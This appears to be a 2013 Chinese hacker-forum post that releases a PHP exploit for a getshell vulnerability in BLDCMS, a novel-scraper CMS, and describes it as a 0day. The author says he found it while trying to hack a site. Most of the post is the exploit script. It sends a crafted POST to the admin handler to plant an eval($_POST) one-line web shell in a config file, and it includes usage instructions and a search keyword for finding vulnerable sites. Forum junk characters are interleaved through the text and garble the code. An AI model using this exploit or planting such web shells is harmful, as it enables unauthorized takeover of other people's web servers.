之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
. q4 G; C( I; W4 ]! s$ E: n/ Z/ z" B8 k( h) ?6 [
6 c: N: [5 j7 u) k5 D话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
0 H* p6 b' w- z0 i' t* B+ W
# |* k; e p* J既然都有人发了 我就把我之前写好的EXP放出来吧
/ K H* g( ^5 P! Z6 q4 N
$ N$ j N0 n7 h q3 T" n- q9 o& Eview source print?01.php;">+ g, [+ v& c2 ~: f- q0 P+ E
02.<!--?php
2 V& X, q; @- C1 `9 \$ R03.echo "-------------------------------------------------------------------
5 V9 v8 ]! z7 b- }4 H& P% x04. 4 H ]0 Q% [9 S- w$ E. Q3 s. O
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
. B# x- u: b. y- ?# G06. % J& @ i7 P! y! b3 d7 `
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
- ?) b' S& F: r& M/ e5 Z08. + g- F: y9 z w7 {/ @* [5 e3 k) q
09.QQ:981009941\r\n 2013.3.21\r\n
4 X- B4 E# X- c% S10.
/ i6 r$ M1 {, Z7 c11.
, c% p; c: w8 _12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码1 ]; i0 g* J ]3 G y
13.
0 p4 m6 j9 {! m( Q0 R3 p' F- y14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------# ]! e) ], f# o$ Q' C2 M" b Y% ]/ Y# N
15. 2 @& B+ F: o* I9 b; F8 C/ w
16.--------------------------------------------------------------------\r\n";
, h& C" x% H# [5 b T17.$url=$argv[1];
, s, P* g C8 e! e18.$dir=$argv[2];9 J0 y! q" w1 b+ Z
19.$pass=$argv[3];
! X- B# e. f; ^% Q% j1 h6 A7 A0 a20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
4 `: m8 f7 f! U2 ]" {0 w" U21.if (emptyempty($pass)||emptyempty($url))" Y4 P8 V2 H0 E& x$ m3 S# I% ]* y5 j
22.{exit("请输入参数");}
; c9 b( b, C/ v3 }6 j* H4 C23.else' _. ^$ ?% q" q, f4 x. a0 i
24.{
+ S# H, ~4 j& }4 _* v8 X25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev& ]' }% Z, J3 `8 X! n7 p% Q
26.
0 R, l( g, r5 \( g# I27.al;
' S% Q/ n% I7 L" F* o& |28.$length = strlen($fuckdata);" K$ C# ?1 I9 a! u7 D7 C- z0 @
29.function getshell($url,$pass)
6 N6 f/ E' b! p30.{
( ]+ C' N; X B* p" a31.global $url,$dir,$pass,$eval,$length,$fuckdata;
& w* _" i$ B1 |; ?32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
0 D$ v0 O# e5 J W33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, @% [/ D; B9 K+ R! \/ _- K* o34.$header .= "User-Agent: MSIE\r\n";
0 E M# h0 S$ K' k( U35.$header .= "Host:".$url."\r\n";. f4 i4 ?1 ]3 f0 I& ?/ @$ D
36.$header .= "Content-Length: ".$length."\r\n";
' @; x/ t( y0 O" E6 H# i37.$header .= "Connection: Close\r\n";) r) H; O# P) @. w
38.$header .="\r\n";
5 e6 w8 Y) m- a39.$header .= $fuckdata."\r\n\r\n";/ ~% t) N& A; r- ?% @& C. i3 h
40.$fp = fsockopen($url, 80,$errno,$errstr,15);0 o; `% p; R$ ~. L* L, _5 h- y; \
41.if (!$fp)1 p7 ?/ C( ^- O8 H; h
42.{0 L( R1 p- ^; [% a& e- M
43.exit ("利用失败:请检查指定目标是否能正常打开");% c8 @) F- J' y8 ]' {$ c; W& b4 ~
44.}( F" v/ [! ~" H7 Z- g* C1 r- A
45.else{ if (!fputs($fp,$header))
% o) O$ x* B4 ]46.{exit ("利用失败");}( ?- K5 s; v& a) J* m! d0 E4 ^
47.else% l: f8 i4 X1 t0 P" V3 L; p+ j. j
48.{0 p" D. X+ N7 ^6 D E3 p
49.$receive = '';
8 j1 k% D4 I" e5 x0 E50.while (!feof($fp)) {! E3 {* G# ?$ b1 q
51.$receive .= @fgets($fp, 1000);8 x! R& U, |# H: {
52.}, b( b3 y; z4 X9 z
53.@fclose($fp);! c$ [# ?( m1 y' p3 ~8 _
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) Q7 P7 R# X# F
55. G; u- j' }$ U6 l( [% s8 G+ p
56.GPC是否=off)";) s" V* o" [& h8 D$ |
57.}}
# }. W1 T5 g) v58.}
9 E) _' z( J& ?* f' D59.}
; H/ \9 y. H% q% w: f60.getshell($url,$pass);" g1 M, s1 W" y" B4 b) l/ o
61.?-->
1 f! J) y1 [5 w 0 E- x1 y3 @) E$ Q
) i m: o9 V9 W
( ?" Y2 J' u7 u4 F+ U
by 数据流2 q5 w% {2 }% o2 y
|
发表于 2013-3-26 20:49:10
收藏
支持
反对